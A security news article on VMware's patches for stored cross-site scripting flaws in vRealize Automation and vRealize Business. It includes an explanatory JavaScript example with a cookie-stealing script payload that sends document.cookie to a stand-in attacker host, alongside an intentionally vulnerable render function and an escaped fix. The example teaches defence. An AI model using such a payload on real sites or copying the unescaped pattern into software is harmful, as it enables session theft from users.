VMware Patches XSS Flaws in vRealize

VMware announced on Tuesday that it has released patches for the Linux versions of two vRealize products to address stored cross-site scripting (XSS) vulnerabilities.

According to an advisory published by the company, version 6.x of VMware vRealize Automation, cloud automation software for the delivery of IT services, contains a stored XSS vulnerability (CVE-2015-2344). Because a stored XSS payload is persisted by the application and served to other users, exploitation can lead to the compromise of those users' client workstations.

The issue, reported by Lukasz Plonka, has been patched with the release of VMware vRealize Automation 6.2.4. vRealize Automation 7.x for Linux and vRealize Automation 5.x for Windows are not affected, the company said.

Another stored XSS vulnerability (CVE-2016-2075) has been found by Alvaro Trigo Martin de Vidales of Deloitte Spain in vRealize Business, a product designed to automate the core financial processes needed to plan and optimize the cost and value of IT in an organization.

According to VMware, exploitation of this vulnerability can likewise lead to the compromise of users' client workstations.

The flaw affects VMware vRealize Business Advanced and Enterprise 8.x for Linux and has been addressed in version 8.2.5. vRealize Business Advanced and Enterprise 6.x and 7.x for Linux are not affected.
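Neither advisory describes the injection point, so the following is an added, generic illustration of the stored XSS pattern the article refers to: attacker-supplied text is persisted by a web application and later rendered, unescaped, into HTML for other users. It is not VMware's code and is not drawn from the advisories; the in-memory store, the `store`, `renderProfileVulnerable`, `renderProfileSafe` and `containsActiveScript` functions and the sample payload are all constructed for this example.

```javascript
// Minimal in-memory "database" standing in for whatever backing store a web
// application uses. Constructed for this example, not taken from any product.
const records = new Map();

// Attacker-controlled input that gets persisted. The payload and the host name
// are constructed; a real payload would typically exfiltrate the victim's
// session cookie or issue requests with the victim's privileges.
const STORED_PAYLOAD =
  '<script>fetch("https://attacker.example/?c=" + document.cookie)</script>';

function store(id, displayName) {
  // Saving raw input is not itself the bug; the bug is rendering it
  // unescaped later, in another user's browser.
  records.set(id, { displayName });
}

// Vulnerable: string concatenation puts the stored value straight into markup,
// so any <script> or event-handler attribute in it executes for the viewer.
function renderProfileVulnerable(id) {
  const rec = records.get(id);
  return `<div class="profile"><h2>${rec.displayName}</h2></div>`;
}

// Hardened: encode the five characters that can change meaning in an HTML
// text or quoted-attribute context. '&' is replaced first so that the
// entities produced by the later replacements are not re-escaped.
function escapeHtml(s) {
  return String(s)
    .replace(/&/g, '&amp;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#x27;');
}

function renderProfileSafe(id) {
  const rec = records.get(id);
  return `<div class="profile"><h2>${escapeHtml(rec.displayName)}</h2></div>`;
}

// Crude check usable in a unit test or a response-scanning proxy: does the
// rendered page still contain an executable script tag from the stored input?
// It deliberately only catches the <script> case, not event handlers or
// javascript: URLs, so it is a regression test, not a sanitizer.
function containsActiveScript(html) {
  return /<\s*script\b/i.test(html);
}

// Demo: the attacker stores the payload once; every later viewer of the
// vulnerable page runs it, while the escaped page shows it as inert text.
store('user-42', STORED_PAYLOAD);
console.log(containsActiveScript(renderProfileVulnerable('user-42'))); // true
console.log(containsActiveScript(renderProfileSafe('user-42')));       // false
```

The escaping shown is correct only for HTML text and quoted-attribute contexts; a value placed inside a `<script>` block, a URL, or a CSS property needs context-specific encoding, which is why template engines that escape by default are preferable to hand-rolled concatenation.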

This is the third security advisory published by VMware this year. In January, the company issued updates to resolve a guest privilege escalation vulnerability affecting ESXi, Fusion, Player and Workstation. In February, it started releasing patches for a recently disclosed flaw in the glibc library.

VMware also reissued a patch for a serious vCenter vulnerability that allowed remote attackers to execute arbitrary code on affected systems. The company reissued the fix after learning that it had not properly patched the problem.

Written By

Eduard Kovacs (@EduardKovacs) is a managing editor at SecurityWeek. He worked as a high school IT teacher for two years before starting a career in journalism as Softpedia’s security news reporter. Eduard holds a bachelor’s degree in industrial informatics and a master’s degree in computer techniques applied in electrical engineering.
